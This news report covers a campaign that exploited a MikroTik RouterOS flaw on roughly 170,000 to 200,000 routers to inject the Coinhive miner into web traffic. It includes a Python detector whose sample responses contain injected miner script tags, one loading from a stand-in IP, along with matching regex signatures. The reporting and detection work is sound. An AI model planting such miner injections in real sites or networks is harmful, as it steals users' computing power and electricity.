Most cryptocurrencies have to be mined before new coins enter circulation. Plenty of people invest in large amounts of hardware and mine for themselves. Attackers want money too, and mining is an attractive source of income for them.
The difference is that attackers usually do it with other people's hardware and other people's electricity. Security researchers recently uncovered a massive cryptojacking campaign that compromises MikroTik routers and uses them to serve a copy of the Coinhive in-browser mining script. Coinhive is the most widely abused in-browser miner around.
The campaign appears to have started this week and was at first concentrated in Brazil. It has since spread to MikroTik routers all over the world.
The attacks were first spotted by a Brazilian researcher (@MalwareHunterBR). As the number of infected routers kept growing, the campaign caught the attention of Simon Kenin, a security researcher at Trustwave's SpiderLabs division.
— MalwareHunterBR (@MalwareHunterBR) July 30, 2018
Numbers of infected routers
In Trustwave's report, Kenin writes that the attacker(s) behind the campaign compromised at least 72,000 MikroTik routers in the first, Brazil-focused stage of the attack.
As the campaign spread beyond Brazil, the total rose to roughly 170,000.
Update: A second campaign of the same type, using a different Coinhive site key, was seen running in parallel. It is not clear whether the same attacker is behind it. Between them, the number of infected routers is about 200,000.
Kenin also said that the attacker(s) exploited a vulnerability in the Winbox component of MikroTik RouterOS (CVE-2018-14847). It was not a zero-day: the flaw was disclosed in April this year and MikroTik shipped a fix within 24 hours. A patch being available is not the same as it being installed, though, and a large number of router owners never applied it.
According to Kenin, the attacker(s) used the publicly available exploit code for that flaw to take over the routers, then altered the traffic passing through them so that a copy of the Coinhive library was injected into every web page served to users behind the router. Only plain HTTP pages can be modified this way; HTTPS traffic cannot be altered in transit without a valid certificate for the site.
Everything found about the attack points to a single threat actor: all of the injected scripts shared the same Coinhive site key.
Other users infected
Kenin says he was also able to identify cases where people who do not own a MikroTik device were affected. Several Brazilian ISPs use MikroTik routers in their core networks, so once those were compromised the attacker(s) could inject the Coinhive mining script into a massive volume of web traffic.
The attacker has also been careful to keep a low profile. If users ran into trouble on every site they visited, both they and their ISPs would start investigating. So the attacker(s) recently changed tactics and now inject the script only into the error pages the router itself returns.
That is less of a setback for the attacker than it sounds. Kenin said that in recent days he has seen the attack spread worldwide, to nearly 170,000 MikroTik routers.
Even limited to error pages, with that many routers there are potentially millions of page views per day for the attacker to monetise.
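The two observations above, that every injected page carried the same Coinhive site key (which is what ties the traffic to one actor) and that the injection later moved to error pages only, are the kind of thing a defender can check directly in captured HTTP responses. The following is an added example written for this article, not code from Trustwave or from the campaign: it takes raw HTTP responses, flags an injected Coinhive loader, pulls out the site key, groups responses by key, and reports whether injection is happening on all pages or only on error pages. The responses and site keys are constructed placeholders; the loader URL and `CoinHive.Anonymous(...)` constructor follow the shape the Coinhive library used.

```python
import re
from collections import defaultdict

# Constructed samples for this example (not captures from the campaign). The
# site keys are placeholders in the 32-character alphanumeric form Coinhive used.
KEY_A = "PLACEHOLDERKEYabcdefghijklmnop12"
KEY_B = "OTHERKEYxyzxyzxyzxyzxyzxyzxyz345"


def _miner_snippet(key, src="https://coinhive.com/lib/coinhive.min.js"):
    # Loader tag plus start call, in the shape the Coinhive library expected.
    return (f'<script src="{src}"></script>'
            f"<script>var miner = new CoinHive.Anonymous('{key}');miner.start();</script>")


SAMPLE_RESPONSES = {
    # Clean page: nothing was injected.
    "shop.example/": (
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        "<html><head><title>Shop</title></head><body>Welcome</body></html>"
    ),
    # First-stage behaviour: script injected into an ordinary 200 page.
    "news.example/article": (
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        "<html><head>" + _miner_snippet(KEY_A) + "</head><body>Article text</body></html>"
    ),
    # Later behaviour: script injected only into an error page the router returns.
    "blocked.example/": (
        "HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n\r\n"
        "<html><head>" + _miner_snippet(KEY_A) + "</head><body>ERROR: Forbidden</body></html>"
    ),
    # Same technique, different key and self-hosted loader: a separate campaign.
    "other.example/missing": (
        "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n"
        "<html><head>" + _miner_snippet(KEY_B, "http://198.51.100.7/coinhive.min.js")
        + "</head><body>Not found</body></html>"
    ),
}

# A <script> whose src ends in coinhive.min.js, wherever it is hosted.
LOADER_RE = re.compile(r'<script[^>]*\bsrc=["\']?([^"\'\s>]*coinhive\.min\.js)', re.I)
# The site key passed to the miner constructor.
KEY_RE = re.compile(r'CoinHive\.(?:Anonymous|User)\(\s*["\']([A-Za-z0-9]{16,64})["\']', re.I)


def split_response(raw):
    """Return (status code, body) for a raw HTTP/1.x response string."""
    head, _, body = raw.partition("\r\n\r\n")
    fields = head.split("\r\n", 1)[0].split(" ", 2)
    status = int(fields[1]) if len(fields) > 1 and fields[1].isdigit() else 0
    return status, body


def analyze(raw):
    """Flag an injected Coinhive miner and pull out the loader URL and site key."""
    status, body = split_response(raw)
    loader = LOADER_RE.search(body)
    key = KEY_RE.search(body)
    return {
        "status": status,
        "error_page": status >= 400,
        "injected": bool(loader or key),
        "loader_src": loader.group(1) if loader else None,
        "site_key": key.group(1) if key else None,
    }


def attribute_by_key(responses):
    """Group injected responses by site key: one key means one Coinhive account."""
    by_key = defaultdict(list)
    for name, raw in responses.items():
        result = analyze(raw)
        if result["injected"] and result["site_key"]:
            by_key[result["site_key"]].append(name)
    return dict(by_key)


def injection_profile(responses):
    """'none', 'error_pages_only' or 'all_pages', matching the tactic change above."""
    statuses = [r["status"] for r in map(analyze, responses.values()) if r["injected"]]
    if not statuses:
        return "none"
    return "error_pages_only" if all(s >= 400 for s in statuses) else "all_pages"


if __name__ == "__main__":
    for name, raw in SAMPLE_RESPONSES.items():
        print(name, analyze(raw))
    print(attribute_by_key(SAMPLE_RESPONSES))
    print(injection_profile(SAMPLE_RESPONSES))
```

Feeding it responses captured on the client side of a suspect router (a proxy log or a pcap decoded to HTTP) gives two useful answers at once: which site key the traffic is being mined for, so separate keys can be tracked as separate campaigns, and whether the router is still injecting into everything or has switched to error pages only. Keep in mind the regex only catches loaders named `coinhive.min.js` and keys passed directly to the constructor; a renamed or obfuscated copy of the library needs a broader signature.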
How to stay safe
If you own a MikroTik router, upgrade RouterOS to the current release and apply every available patch; the fix for the flaw used here has been available since April. It is also worth restricting the Winbox and web management services to trusted addresses rather than leaving them reachable from the Internet.
Before upgrading, reset the router to its factory default configuration so that any malicious configuration or scripts the attacker left behind are removed rather than carried over, and then set new administrative passwords: the exploited flaw let the attacker read the router's stored credentials, so the old ones must be treated as compromised.